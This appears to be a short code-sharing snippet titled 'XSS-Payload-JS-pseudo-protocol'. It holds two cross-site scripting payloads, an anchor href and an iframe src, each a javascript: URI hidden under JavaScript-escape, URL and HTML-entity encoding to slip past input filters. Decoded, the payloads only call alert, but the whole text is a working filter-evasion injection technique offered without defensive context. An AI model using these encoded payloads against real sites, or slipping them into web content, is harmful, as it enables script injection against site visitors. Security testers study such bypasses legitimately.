XSS-Payload-JS-pseudo-protocol

by zicai

HTML

<!-- JavaScript 伪协议  -->
<!-- 先 JavaScript 编码,再 URL 编码,再 HTML 编码 -->
<a href="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&colon;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x36;&#x31;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x36;&#x43;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x36;&#x35;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x37;&#x32;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x37;&#x34;&percnt;&#x32;&#x38;&percnt;&#x32;&#x37;&#x61;&#x2D;&#x68;&#x72;&#x65;&#x66;&percnt;&#x32;&#x37;&percnt;&#x32;&#x39;">click me</a>

<iframe src="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&colon;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x36;&#x31;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x36;&#x43;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x36;&#x35;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x37;&#x32;&percnt;&#x35;&#x43;&#x75;&#x30;&#x30;&#x37;&#x34;&percnt;&#x32;&#x38;&percnt;&#x32;&#x37;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x2D;&#x73;&#x72;&#x63;&percnt;&#x32;&#x37;&percnt;&#x32;&#x39;" frameborder="0"></iframe>